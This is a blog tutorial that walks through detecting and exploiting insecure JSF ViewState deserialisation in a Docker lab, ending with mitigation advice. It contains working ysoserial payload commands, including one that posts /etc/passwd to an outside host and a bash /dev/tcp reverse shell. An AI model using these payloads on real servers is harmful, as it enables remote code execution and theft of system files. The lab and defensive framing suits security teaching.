Demystifying Insecure Deserialisation on JSF Application

Hi Everyone,

I’m back with an another blog on interesting vulnerability Insecure Deserialisation on JSF Applications which occurs due to the Misconfigured Viewstate

Difference between Serialization & Deserialization:

  • Serialization is the process of taking an object and translating it into plaintext. This plaintext can then be encrypted or signed, as well as simply used the way it is.

  • The reverse process is called Deserialization, i.e. when the plaintext is converted back to an object.


  • The purpose of “ViewState” is to memorize the state of the user, even after numerous HTTP queries (stateless protocol).
  • Different Types of View-state
    1. .Net - ___Viewstate
    2. JSF - javax.faces.Viewstate

Flow of JSF ViewState

  • The “ViewState” of a page is by default, stored in a hidden form field in the web page named javax.faces.ViewState.
  • ViewState starts with H4sIAAAA, which represent the Base64Gzip.

Layers in JSF Viewstate

Environment Setup

Step 1: Create a Docker Compose file using the following command


version: '2'
    image: vulhub/mojarra:2.1.28
      - "8080:8080"

Step 2: Execute the following command to start a JSF application which using JDK7u21 and Mojarra 2.1.28

docker-compose up -d

Step 3: After the application is started, visit to see the demo page.

Decoding JSF Viewstate

Step 1: Open the Demo URL , give a sample input and intercept the request using Client-Side Proxy such as Burpsuite as shown below.

Step 2: In the request body, it can be observed that the application uses JSF Viewstate format.

Step 3: Select the javax.faces.ViewState values , right click & send it to Decoder as shown below.

Step 4: First do a URL Decode -> Base64 Decode -> GZip Decode.

Step 5: The final output gives some information about the java utils and components used in the application.

Burpsuite Extenders & Tools Configuration

  • Install Java Deserialization Scanner from Extenders -> BApp Store.

  • Navigate to the Deserialization Scanner -> Configurations and configure the ysoserial.

Note: ysoserial can be downloaded from

  • We need to find the payload type in-order to use the ysoserial tool.

Vulnerability Detection

Step 1: Intercept the request of the application and send the request to DS - Manual Testing .

Step 2: Select the javax.faces.ViewState values and Set Insertion Point.

Step 3: Choose Attack (Base64GZip) as shown below.

Step 4: If the viewstate is vulnerable, it will show Potentially VULNERABLE!!!.

Step 5: Now we got the payload type which is Jdk7u21

Exploitation Phase

NOTE: There are two ways to Exploit a JSF Viewstate Deserialisation

  • Out-Of-Band
  • Reverse Shell

Exploitation using Deserialization Scanner

Step 1: Send the vulnerable request to DS - Exploitation Tab

Step 2: Using the following command to perform a OOB Deserialisation and Read Internal Files of the application

Jdk7u21 "wget --post-file /etc/passwd"

Manual Payload Creation using Ysoserial

Ysoserial Syntax

java -jar ysoserial-[version]-all.jar [payload] '[command]'

Payload Command

java -jar ysoserial-master-SNAPSHOT.jar Jdk7u21 "wget --post-file /etc/passwd" | gzip | base64 -w 0

  • Replace the javax.faces.ViewState value with the Ysoserial generated payload and URL Encode it.

  • Click on Go and Observe the response in Burp Collaborator.

Establishing a Stable Reverse Shell

Step 1: Send the vulnerable request to DS - Exploitation Tab

Step 2: Use the following Bash Reverse Shell command to gain a Reverse Shell.

Jdk7u21 "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/ipaddress/1337<&1"
  • bash -i >& - Invokes bash with an “interactive” option.
  • /dev/tcp/ipaddress/1337 - Redirects that session to a tcp socket via device file.
  • 0>&1 - Takes standard output, and connects it to standard input.

Now we have reached stable Reverse Shell using JSF Viewstate Deserialisation.

Mitigation :

  • Always validate the scope of Java objects. It is not recommended to use the scope @ViewScoped, because it is often the source of information leaks.
  • Use the keyword transient on attributes you do not want to store in the ViewState. It will prevent their serialization.
  • Always encrypt the ViewState and use an integrity check mechanism if the implementation supports it.
  • Never trust the data contained in a ViewState. Consider they have been potentially tampered by a user. So, you must check them carefully to prevent the attacks previously described.

Reference :

Java Deserialization in ViewState

Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities

JSF ViewState upside-down

Thanks a lot for reading :)

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